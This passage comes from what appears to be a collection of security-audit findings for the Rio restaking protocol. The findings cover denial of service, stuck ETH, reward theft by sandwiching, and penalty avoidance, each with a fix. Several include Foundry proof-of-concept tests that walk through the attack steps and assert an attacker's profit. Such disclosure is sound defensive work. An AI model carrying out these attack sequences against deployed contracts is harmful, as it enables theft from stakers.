utilization: 70}));\\n heap.store(heapStore);\\n\\n console.log(\"Heaps count\", heap.count);\\n console.log(\"1st\", heap.operators[1].id);\\n console.log(\"2nd\", heap.operators[2].id);\\n console.log(\"3rd\", heap.operators[3].id);\\n\\n // remove 2\\n heap.removeByID(3);\\n heap.store(heapStore);\\n\\n console.log(\"Heaps count\", heap.count);\\n console.log(\"1st\", heap.operators[1].id);\\n console.log(\"2nd\", heap.operators[2].id);\\n console.log(\"3rd\", heap.operators[3].id);\\n }\\n```\\n\\nLogs:\\n2- When the operator cap is reseted the allocations/deallocations will not work due to above heap issue because of division by zero\\nNow, take the above example, we removed the operatorId 3 from the heap by setting its cap to \"0\". Now, there are only operators 1 and 2 active for that specific strategy. When there are idle funds in the deposit pool before the rebalance call, the excess funds that are not requested as withdrawals will be pushed to EigenLayer as follows:\\n```\\nfunction rebalance(address asset) external checkRebalanceDelayMet(asset) {\\n .\\n .\\n -> (uint256 sharesReceived, bool isDepositCapped) = depositPool().depositBalanceIntoEigenLayer(asset);\\n .\\n }\\n```\\n\\n```\\n function depositBalanceIntoEigenLayer(address asset) external onlyCoordinator returns (uint256, bool) {\\n uint256 amountToDeposit = asset.getSelfBalance();\\n if (amountToDeposit == 0) return (0, false);\\n .\\n .\\n -> return (OperatorOperations.depositTokenToOperators(operatorRegistry(), asset, strategy, sharesToAllocate), isDepositCapped);\\n }\\n```\\n\\n```\\nfunction depositTokenToOperators(\\n IRioLRTOperatorRegistry operatorRegistry,\\n address token,\\n address strategy,\\n uint256 sharesToAllocate\\n ) internal returns (uint256 sharesReceived) {\\n -> (uint256 sharesAllocated, IRioLRTOperatorRegistry.OperatorStrategyAllocation[] memory allocations) = operatorRegistry.allocateStrategyShares(\\n strategy, sharesToAllocate\\n );\\n .\\n .\\n 
}\\n```\\n\\n```\\nfunction allocateStrategyShares(address strategy, uint256 sharesToAllocate) external onlyDepositPool returns (uint256 sharesAllocated, OperatorStrategyAllocation[] memory allocations) {\\n -> OperatorUtilizationHeap.Data memory heap = s.getOperatorUtilizationHeapForStrategy(strategy);\\n .\\n .\\n .\\n .\\n }\\n```\\n\\n```\\nfunction getOperatorUtilizationHeapForStrategy(RioLRTOperatorRegistryStorageV1.StorageV1 storage s, address strategy) internal view returns (OperatorUtilizationHeap.Data memory heap) {\\n uint8 numActiveOperators = s.activeOperatorCount;\\n if (numActiveOperators == 0) return OperatorUtilizationHeap.Data(new OperatorUtilizationHeap.Operator[](0), 0);\\n \\n heap = OperatorUtilizationHeap.initialize(MAX_ACTIVE_OPERATOR_COUNT);\\n LibMap.Uint8Map storage operators = s.activeOperatorsByStrategyShareUtilization[strategy];\\n\\n IRioLRTOperatorRegistry.OperatorShareDetails memory operatorShares;\\n unchecked {\\n uint8 i;\\n for (i = 0; i < numActiveOperators; ++i) {\\n uint8 operatorId = operators.get(i);\\n\\n // Non-existent operator ID. We've reached the end of the heap.\\n if (operatorId == 0) break;\\n\\n operatorShares = s.operatorDetails[operatorId].shareDetails[strategy];\\n heap.operators[i + 1] = OperatorUtilizationHeap.Operator({\\n id: operatorId,\\n -> utilization: operatorShares.allocation.divWad(operatorShares.cap)\\n });\\n }\\n heap.count = i;\\n }\\n }\\n```\\n\\nAs we can see in one above code snippet, the `numActiveOperators` is 3. Since the stored heaps last element is not set to \"0\" it will point to operatorId 3 which has a cap of \"0\" after the removal. 
This will make the\\n```\\nutilization: operatorShares.allocation.divWad(operatorShares.cap)\\n```\\n\\npart of the code to perform a division by zero and the function will revert.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorRegistryTest --match-test test_Capped0ValidatorBricksFlow -vv\\n function test_Capped0ValidatorBricksFlow() public {\\n // Add 3 operators\\n addOperatorDelegators(reLST.operatorRegistry, address(reLST.rewardDistributor), 3);\\n\\n // The caps for each operator is 1000e18, we will delete the id 2 so we need funds there\\n // any number that is more than 1000 should be ok for that experiement \\n uint256 AMOUNT = 1002e18;\\n\\n // Allocate to cbETH strategy.\\n cbETH.approve(address(reLST.coordinator), type(uint256).max);\\n uint256 lrtAmount = reLST.coordinator.deposit(CBETH_ADDRESS, AMOUNT);\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n\\n // Build the empty caps\\n IRioLRTOperatorRegistry.StrategyShareCap[] memory zeroStrategyShareCaps =\\n new IRioLRTOperatorRegistry.StrategyShareCap[](1);\\n zeroStrategyShareCaps[0] = IRioLRTOperatorRegistry.StrategyShareCap({strategy: CBETH_STRATEGY, cap: 0});\\n\\n // Set the caps of CBETH_STRATEGY for operator 2 as \"0\"\\n reLST.operatorRegistry.setOperatorStrategyShareCaps(2, zeroStrategyShareCaps);\\n\\n // Try an another deposit, we expect revert when we do the rebalance\\n reLST.coordinator.deposit(CBETH_ADDRESS, 10e18);\\n\\n // Push funds into EigenLayer. 
Expect revert, due to division by \"0\"\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.startPrank(EOA, EOA);\\n vm.expectRevert(bytes4(keccak256(\"DivWadFailed()\")));\\n reLST.coordinator.rebalance(CBETH_ADDRESS);\\n vm.stopPrank();\\n }\\n```\\nчWhen removing from the heap also remove the last element from the heap.\\nI am not sure of this, but this might work\\n```\\nfunction _remove(Data memory self, uint8 i) internal pure {\\n self.operators[i] = self.operators[--self.count];\\n }\\n```\\nчCore logic broken, withdrawal/deposits can not be performed.ч```\\nfunction setOperatorStrategyCap(\\n RioLRTOperatorRegistryStorageV1.StorageV1 storage s,\\n uint8 operatorId,\\n IRioLRTOperatorRegistry.StrategyShareCap memory newShareCap\\n ) internal {\\n .\\n OperatorUtilizationHeap.Data memory utilizationHeap = s.getOperatorUtilizationHeapForStrategy(newShareCap.strategy);\\n // If the current cap is greater than 0 and the new cap is 0, remove the operator from the strategy.\\n if (currentShareDetails.cap > 0 && newShareCap.cap == 0) {\\n // If the operator has allocations, queue them for exit.\\n if (currentShareDetails.allocation > 0) {\\n operatorDetails.queueOperatorStrategyExit(operatorId, newShareCap.strategy);\\n }\\n // Remove the operator from the utilization heap.\\n -> utilizationHeap.removeByID(operatorId);\\n }\\n .\\n\\n // Persist the updated heap to the active operators tracking.\\n -> utilizationHeap.store(s.activeOperatorsByStrategyShareUtilization[newShareCap.strategy]);\\n .\\n }\\n```\\n -Ether can stuck when an operators validators are removed due to an user front-runningчmediumчWhen a full withdrawal occurs in the EigenPod, the excess amount can remain idle within the EigenPod and can only be swept by calling a function in the delegator contract of a specific operator. 
However, in cases where the owner removes all validators for emergencies or any other reason, a user can frontrun the transaction, willingly or not, causing the excess ETH to become stuck in the EigenPod. The only way to recover the ether would be for the owner to reactivate the validators, which may not be intended since the owner initially wanted to remove all the validators and now needs to add them again.\\nLet's assume a Layered Relay Token (LRT) with a beacon chain strategy and only two operators for simplicity. Each operator is assigned two validators, allowing each operator to stake 64 ETH in the PoS staking via the EigenPod.\\nThis function triggers a full withdrawal from the operator's delegator EigenPod. The `queueOperatorStrategyExit` function will withdraw the entire validator balance as follows:\\n```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n\\n`operatorDetails.queueOperatorStrategyExit` function will full withdraw the entire validator balance as follows:\\n```\\nfunction queueOperatorStrategyExit(IRioLRTOperatorRegistry.OperatorDetails storage operator, uint8 operatorId, address strategy) internal {\\n IRioLRTOperatorDelegator delegator = IRioLRTOperatorDelegator(operator.delegator);\\n\\n uint256 sharesToExit;\\n if (strategy == BEACON_CHAIN_STRATEGY) {\\n // Queues an exit for verified validators only. Unverified validators must by exited once verified,\\n // and ETH must be scraped into the deposit pool. Exits are rounded to the nearest Gwei. It is not\\n // possible to exit ETH with precision less than 1 Gwei. 
We do not populate `sharesToExit` if the\\n // Eigen Pod shares are not greater than 0.\\n int256 eigenPodShares = delegator.getEigenPodShares();\\n if (eigenPodShares > 0) {\\n sharesToExit = uint256(eigenPodShares).reducePrecisionToGwei();\\n }\\n } else {\\n .\\n }\\n .\\n }\\n```\\n\\nAs observed, the entire EigenPod shares are requested as a withdrawal, which is 64 Ether. However, a user can request a 63 Ether withdrawal before the owner's transaction from the coordinator, which would also trigger a full withdrawal of 64 Ether. In the end, the user would receive 63 Ether, leaving 1 Ether idle in the EigenPod:\\n```\\nfunction queueETHWithdrawalFromOperatorsForUserSettlement(IRioLRTOperatorRegistry operatorRegistry, uint256 amount) internal returns (bytes32 aggregateRoot) {\\n .\\n for (uint256 i = 0; i < length; ++i) {\\n address delegator = operatorDepositDeallocations[i].delegator;\\n\\n -> // Ensure we do not send more than needed to the withdrawal queue. The remaining will stay in the Eigen Pod.\\n uint256 amountToWithdraw = (i == length - 1) ? remainingAmount : operatorDepositDeallocations[i].deposits * ETH_DEPOSIT_SIZE;\\n\\n remainingAmount -= amountToWithdraw;\\n roots[i] = IRioLRTOperatorDelegator(delegator).queueWithdrawalForUserSettlement(BEACON_CHAIN_STRATEGY, amountToWithdraw);\\n }\\n .\\n }\\n```\\n\\nIn such a scenario, the queued amount would be 63 Ether, and 1 Ether would remain idle in the EigenPod. Since the owner's intention was to shut down the validators in the operator for good, that 1 Ether needs to be scraped as well. 
However, the owner is unable to sweep it due to MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE:\\n```\\nfunction scrapeExcessFullWithdrawalETHFromEigenPod() external {\\n // @review this is 1 ether\\n uint256 ethWithdrawable = eigenPod.withdrawableRestakedExecutionLayerGwei().toWei();\\n // @review this is also 1 ether\\n -> uint256 ethQueuedForWithdrawal = getETHQueuedForWithdrawal();\\n if (ethWithdrawable <= ethQueuedForWithdrawal + MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE) {\\n revert INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH();\\n }\\n _queueWithdrawalForOperatorExitOrScrape(BEACON_CHAIN_STRATEGY, ethWithdrawable - ethQueuedForWithdrawal);\\n }\\n```\\n\\nWhich means that owner has to set the validator caps for the operator again to recover that 1 ether which might not be possible since the owner decided to shutdown the entire validators for the specific operator.\\nAnother scenario from same root cause: 1- There are 64 ether in an operator 2- Someone requests a withdrawal of 50 ether 3- All 64 ether is withdrawn from beacon chain 4- 50 ether sent to the users withdrawal, 14 ether is idle in the EigenPod waiting for someone to call `scrapeExcessFullWithdrawalETHFromEigenPod` 5- An user quickly withdraws 13 ether 6- `withdrawableRestakedExecutionLayerGwei` is 1 ether and `INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH` also 1 ether. 
Which means the 1 ether can't be re-added to deposit pool until someone withdraws.\\nCoded PoC:\\n```\\n// forge test --match-contract RioLRTOperatorDelegatorTest --match-test test_StakeETHCalledWith0Ether -vv\\n function test_StuckEther() public {\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n address operatorDelegator = reETH.operatorRegistry.getOperatorDetails(operatorId).delegator;\\n\\n uint256 TVL = 64 ether;\\n uint256 WITHDRAWAL_AMOUNT = 63 ether;\\n RioLRTOperatorDelegator delegatorContract = RioLRTOperatorDelegator(payable(operatorDelegator));\\n\\n // Allocate ETH.\\n reETH.coordinator.depositETH{value: TVL - address(reETH.depositPool).balance}();\\n\\n\\n // Push funds into EigenLayer.\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n\\n // Verify validator withdrawal credentials.\\n uint40[] memory validatorIndices = verifyCredentialsForValidators(reETH.operatorRegistry, operatorId, 2);\\n\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Withdraw some funds.\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, WITHDRAWAL_AMOUNT);\\n uint256 withdrawalEpoch = reETH.withdrawalQueue.getCurrentEpoch(ETH_ADDRESS);\\n\\n // Skip ahead and rebalance to queue the withdrawal within EigenLayer.\\n skip(reETH.coordinator.rebalanceDelay());\\n\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n // Verify and process two full validator exits.\\n verifyAndProcessWithdrawalsForValidatorIndexes(operatorDelegator, validatorIndices);\\n\\n // Settle with withdrawal epoch.\\n IDelegationManager.Withdrawal[] memory withdrawals = new IDelegationManager.Withdrawal[](1);\\n withdrawals[0] = IDelegationManager.Withdrawal({\\n staker: operatorDelegator,\\n delegatedTo: address(1),\\n withdrawer: address(reETH.withdrawalQueue),\\n nonce: 0,\\n startBlock: 1,\\n strategies: 
BEACON_CHAIN_STRATEGY.toArray(),\\n shares: WITHDRAWAL_AMOUNT.toArray()\\n });\\n reETH.withdrawalQueue.settleEpochFromEigenLayer(ETH_ADDRESS, withdrawalEpoch, withdrawals, new uint256[](1));\\n\\n vm.expectRevert(bytes4(keccak256(\"INSUFFICIENT_EXCESS_FULL_WITHDRAWAL_ETH()\")));\\n delegatorContract.scrapeExcessFullWithdrawalETHFromEigenPod();\\n }\\n```\\nчMake an emergency function which owner can scrape the excess eth regardless of `MIN_EXCESS_FULL_WITHDRAWAL_ETH_FOR_SCRAPE`чOwner needs to set the caps again to recover the 1 ether. However, the validators are removed for a reason and adding operators again would probably be not intended since it was a shutdown. Hence, I'll label this as medium.ч```\\nif (validatorDetails.cap > 0 && newValidatorCap == 0) {\\n // If there are active deposits, queue the operator for strategy exit.\\n if (activeDeposits > 0) {\\n -> operatorDetails.queueOperatorStrategyExit(operatorId, BEACON_CHAIN_STRATEGY);\\n .\\n }\\n .\\n } else if (validatorDetails.cap == 0 && newValidatorCap > 0) {\\n .\\n } else {\\n .\\n }\\n```\\n -A part of ETH rewards can be stolen by sandwiching `claimDelayedWithdrawals()`чmediumчRewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe protocol handles ETH rewards by sending them to the rewards distributor. There are at least 3 flows that end-up sending funds there:\\nWhen the function RioLRTOperatorDelegator::scrapeNonBeaconChainETHFromEigenPod() is called to scrape non beacon chain ETH from an Eigenpod.\\nWhen a validator receives rewards via partial withdrawals after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nWhen a validator exists and has more than 32ETH the excess will be sent as rewards after the function EigenPod::verifyAndProcessWithdrawals() is called.\\nAll of these 3 flows end up queuing a withdrawal to the rewards distributor. 
After a delay the rewards can claimed by calling the permissionless function EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), this call will instantly increase the TVL of the protocol.\\nAn attacker can take advantage of this to steal a part of the rewards:\\nMint a sensible amount of `LRTTokens` by depositing an accepted asset\\nCall EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), after which the value of the `LRTTokens` just minted will immediately increase.\\nRequest a withdrawal for all the `LRTTokens` via RioLRTCoordinator::requestWithdrawal().\\nPOC\\nChange RioLRTRewardsDistributor::receive() (to side-step a gas limit bug:\\n```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n\\nAdd the following imports to RioLRTOperatorDelegator:\\n```\\nimport {IRioLRTWithdrawalQueue} from 'contracts/interfaces/IRioLRTWithdrawalQueue.sol';\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nTo copy-paste in RioLRTOperatorDelegator.t.sol:\\n```\\nfunction test_stealRewards() public {\\n address alice = makeAddr(\"alice\");\\n address bob = makeAddr(\"bob\");\\n uint256 aliceInitialBalance = 40e18;\\n uint256 bobInitialBalance = 40e18;\\n deal(alice, aliceInitialBalance);\\n deal(bob, bobInitialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n vm.prank(bob);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n 
//-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: aliceInitialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to \"simulate\" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> A full withdrawal for the validator is processed, 8ETH (40ETH - 32ETH) will be queued as rewards\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Bob, an attacker, does the following:\\n // 1. Deposits 40ETH and receives ~40e18 LRTTokens\\n // 2. Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n // 3. Requests a withdrawal with all of the LRTTokens \\n {\\n //1. Deposits 40ETH and receives ~40e18 LRTTokens\\n vm.startPrank(bob);\\n reETH.coordinator.depositETH{value: bobInitialBalance}();\\n\\n //2. 
Cliam the withdrawal for the validator, which will instantly increase the TVL by ~7.2ETH\\n uint256 TVLBefore = reETH.assetRegistry.getTVL();\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); \\n uint256 TVLAfter = reETH.assetRegistry.getTVL();\\n\\n //->TVL increased by 7.2ETH\\n assertEq(TVLAfter - TVLBefore, 7.2e18);\\n\\n //3. Requests a withdrawal with all of the LRTTokens \\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, reETH.token.balanceOf(bob));\\n vm.stopPrank();\\n }\\n \\n //-> Wait and rebalance\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Bob withdraws the funds he requested\\n vm.prank(bob);\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n\\n //-> Bob has stole ~50% of the rewards and has 3.59ETH more than he initially started with\\n assertGt(bob.balance, bobInitialBalance);\\n assertEq(bob.balance - bobInitialBalance, 3599550056000000000);\\n}\\n```\\nчWhen requesting withdrawals via RioLRTCoordinator::requestWithdrawal() don't distribute the rewards received in the current epoch.чRewards can be stolen by sandwiching the call to EigenLayer::DelayedWithdrawalRouter::claimDelayedWithdrawals(), however this requires a bigger investment in funds the higher the protocol TVL.ч```\\nreceive() external payable {\\n (bool success,) = address(rewardDistributor()).call{value: msg.value}('');\\n require(success);\\n}\\n```\\n -The protocol can't receive rewards because of low gas limits on ETH transfersчmediumчThe hardcoded gas limit of the Asset::transferETH() function, used to transfer ETH in the protocol, is too low and will result unwanted reverts.\\nETH transfers in the protocol are always done via Asset::transferETH(), which performs a low-level call with an hardcoded gas limit of 10_000:\\n```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif 
(!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n\\nThe hardcoded `10_000` gas limit is not high enough for the protocol to be able to receive and distribute rewards. Rewards are currently only available for native ETH, and are received by Rio via:\\nPartial withdrawals\\nETH in excess of `32ETH` on full withdrawals\\nThe flow to receive rewards requires two steps:\\nAn initial call to EigenPod::verifyAndProcessWithdrawals(), which queues a withdrawal to the Eigenpod owner: an `RioLRTOperatorDelegator` instance\\nA call to DelayedWithdrawalRouter::claimDelayedWithdrawals().\\nThe call to DelayedWithdrawalRouter::claimDelayedWithdrawals() triggers the following flow:\\nETH is transferred to the RioLRTOperatorDelegator instance, where the `receive()` function is triggered.\\nThe `receive()` function of RioLRTOperatorDelegator transfers ETH via Asset::transferETH() to the RioLRTRewardDistributor, where another `receive()` function is triggered.\\nThe `receive()` function of RioLRTRewardDistributor transfers ETH via Asset::transferETH() to the `treasury`, the `operatorRewardPool` and the `RioLRTDepositPool`.\\nThe gas is limited at `10_000` in step `2` and is not enough to perform step `3`, making it impossible for the protocol to receive rewards and leaving funds stuck.\\nPOC\\nAdd the following imports to RioLRTOperatorDelegator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nfunction test_outOfGasOnRewards() public {\\n address alice = makeAddr(\"alice\");\\n uint256 initialBalance = 40e18;\\n deal(alice, initialBalance);\\n vm.prank(alice);\\n reETH.token.approve(address(reETH.coordinator), type(uint256).max);\\n\\n //->Operator delegator and validators are added to the protocol\\n uint8 
operatorId = addOperatorDelegator(reETH.operatorRegistry, address(reETH.rewardDistributor));\\n RioLRTOperatorDelegator operatorDelegator =\\n RioLRTOperatorDelegator(payable(reETH.operatorRegistry.getOperatorDetails(operatorId).delegator));\\n\\n //-> Alice deposits ETH in the protocol\\n vm.prank(alice);\\n reETH.coordinator.depositETH{value: initialBalance}();\\n \\n //-> Rebalance is called and the ETH deposited in a validator\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Create a new validator with a 40ETH balance and verify his credentials.\\n //-> This is to \"simulate\" rewards accumulation\\n uint40[] memory validatorIndices = new uint40[](1);\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorId);\\n bytes32 withdrawalCredentials = operatorDelegator.withdrawalCredentials();\\n beaconChain.setNextTimestamp(block.timestamp);\\n CredentialsProofs memory proofs;\\n (validatorIndices[0], proofs) = beaconChain.newValidator({\\n balanceWei: 40 ether,\\n withdrawalCreds: abi.encodePacked(withdrawalCredentials)\\n });\\n \\n //-> Verify withdrawal crendetials\\n vm.prank(details.manager);\\n reETH.operatorRegistry.verifyWithdrawalCredentials(\\n operatorId,\\n proofs.oracleTimestamp,\\n proofs.stateRootProof,\\n proofs.validatorIndices,\\n proofs.validatorFieldsProofs,\\n proofs.validatorFields\\n );\\n\\n //-> Process a full withdrawal, 8ETH (40ETH - 32ETH) will be queued withdrawal as \"rewards\"\\n verifyAndProcessWithdrawalsForValidatorIndexes(address(operatorDelegator), validatorIndices);\\n\\n //-> Call `claimDelayedWithdrawals` to claim the withdrawal\\n delayedWithdrawalRouter.claimDelayedWithdrawals(address(operatorDelegator), 1); //❌ Reverts for out-of-gas\\n}\\n```\\nчRemove the hardcoded `10_000` gas limit in Asset::transferETH(), at least on ETH transfers where the destination is a protocol controlled contract.чThe protocol is unable to receive rewards 
and the funds will be stuck.ч```\\n(bool success,) = recipient.call{value: amount, gas: 10_000}('');\\nif (!success) {revert ETH_TRANSFER_FAILED();}\\n```\\n -Stakers can avoid validator penaltiesчmediumчStakers can frontrun validator penalties and slashing events with a withdrawal request in order to avoid the loss; this is possible if the deposit pool has enough liquidity available.\\nValidators can lose part of their deposit via penalties or slashing events:\\nIn case of penalties Eigenlayer can be notified of the balance drop via the permissionless function EigenPod::verifyBalanceUpdates().\\nIn case of slashing the validator is forced to exit and Eigenlayer can be notified via the permissionless function EigenPod::verifyAndProcessWithdrawals() because the slashing event is effectively a full withdrawal.\\nAs soon as either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() is called the TVL of the Rio protocol drops instantly. This is because both of the functions update the variable podOwnerShares[podOwner]:\\nEigenPod::verifyBalanceUpdates() will update the variable here\\nEigenPod::verifyAndProcessWithdrawals() will update the variable here\\nThis makes it possible for stakers to:\\nRequest a withdrawal via RioLRTCoordinator::requestWithdrawal() for all the `LRTTokens` held.\\nCall either EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals().\\nAt this point, when RioLRTCoordinator::rebalance() is called, a withdrawal will be queued that does not include penalties or slashing.\\nIt's possible to withdraw `LRTTokens` while avoiding penalties or slashing up to the amount of liquidity available in the deposit pool.\\nPOC\\nI wrote a POC whose main point is to show that requesting a withdrawal before an instant TVL drop will withdraw the full amount requested without taking the drop into account. 
The POC doesn't show that EigenPod::verifyBalanceUpdates() or EigenPod::verifyAndProcessWithdrawals() actually lowers the TVL because I wasn't able to implement it in the tests.\\nAdd imports to RioLRTCoordinator.t.sol:\\n```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport {RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n\\nthen copy-paste:\\n```\\nIRioLRTOperatorRegistry.StrategyShareCap[] public emptyStrategyShareCaps;\\nfunction test_avoidInstantPriceDrop() public {\\n //-> Add two operators with 1 validator each\\n uint8[] memory operatorIds = addOperatorDelegators(\\n reETH.operatorRegistry,\\n address(reETH.rewardDistributor),\\n 2,\\n emptyStrategyShareCaps,\\n 1\\n );\\n address operatorAddress0 = address(uint160(1));\\n\\n //-> Deposit ETH so there's 74ETH in the deposit pool\\n uint256 depositAmount = 2*ETH_DEPOSIT_SIZE - address(reETH.depositPool).balance;\\n uint256 amountToWithdraw = 10 ether;\\n reETH.coordinator.depositETH{value: amountToWithdraw + depositAmount}();\\n\\n //-> Stake the 64ETH on the validators, 32ETH each and 10 ETH stay in the deposit pool\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker notices a validator is going receive penalties and immediately requests a withdrawal of 10ETH\\n reETH.coordinator.requestWithdrawal(ETH_ADDRESS, amountToWithdraw);\\n\\n //-> Validator get some penalties and Eigenlayer notified \\n //IMPORTANT: The following block of code it's a simulation of what would happen if a validator balances gets lowered because of penalties\\n //and `verifyBalanceUpdates()` gets called on Eigenlayer. 
It uses another bug to achieve an instant loss of TVL.\\n\\n // ~~~Start penalties simulation~~~\\n {\\n //-> Verify validators credentials of the two validators\\n verifyCredentialsForValidators(reETH.operatorRegistry, 1, 1);\\n verifyCredentialsForValidators(reETH.operatorRegistry, 2, 1);\\n\\n //-> Cache current TVL and ETH Balance\\n uint256 TVLBefore = reETH.coordinator.getTVL();\\n\\n //->Operator calls `undelegate()` on Eigenlayer\\n //IMPORTANT: This achieves the same a calling `verifyBalanceUpdates()` on Eigenlayer after a validator suffered penalties,\\n //an instant drop in TVL.\\n IRioLRTOperatorRegistry.OperatorPublicDetails memory details = reETH.operatorRegistry.getOperatorDetails(operatorIds[0]);\\n vm.prank(operatorAddress0);\\n delegationManager.undelegate(details.delegator);\\n\\n //-> TVL dropped\\n uint256 TVLAfter = reETH.coordinator.getTVL();\\n\\n assertLt(TVLAfter, TVLBefore);\\n }\\n // ~~~End penalties simulation~~~\\n\\n //-> Rebalance gets called\\n skip(reETH.coordinator.rebalanceDelay());\\n vm.prank(EOA, EOA);\\n reETH.coordinator.rebalance(ETH_ADDRESS);\\n\\n //-> Attacker receives all of the ETH he withdrew, avoiding the effect of penalties\\n uint256 balanceBefore = address(this).balance;\\n reETH.withdrawalQueue.claimWithdrawalsForEpoch(IRioLRTWithdrawalQueue.ClaimRequest({asset: ETH_ADDRESS, epoch: 0}));\\n uint256 balanceAfter = address(this).balance;\\n assertEq(balanceAfter - balanceBefore, amountToWithdraw);\\n}\\n```\\nчWhen RioLRTCoordinator::rebalance() is called and penalties or slashing events happened during the epoch being settled, distribute the correct amount of penalties to all the `LRTTokens` withdrawn in the current epoch, including the ones that requested the withdrawal before the drop.чStakers can avoid validator penalties and slashing events if there's enough liquidity in the deposit pool.ч```\\nimport {IRioLRTOperatorRegistry} from 'contracts/interfaces/IRioLRTOperatorRegistry.sol';\\nimport 
{RioLRTOperatorDelegator} from 'contracts/restaking/RioLRTOperatorDelegator.sol';\\nimport {CredentialsProofs, BeaconWithdrawal} from 'test/utils/beacon-chain/MockBeaconChain.sol';\\n```\\n -All operators can have ETH deposits regardless of the cap setted for them leading to miscalculated TVLчmediumчSome operators might not be eligible for using some strategies in the LRT's underlying tokens. However, in default every operator can have ETH deposits which would impact the TVL/Exchange rate of the LRT regardless of they have a cap or not.\\nFirst, let's examine how an operator can have ETH deposit\\nAn operator can have ETH deposits by simply staking in beacon chain, to do so they are not mandatory to call EigenPods \"stake\" function. They can do it separately without calling the EigenPods stake function.\\nAlso, every operator delegator contract can call `verifyWithdrawalCredentials` to increase EigenPod shares and decrease the queued ETH regardless of they are active operator or they have a cap determined for BEACON_CHAIN_STRATEGY.\\nNow, let's look at how the TVL of ETH 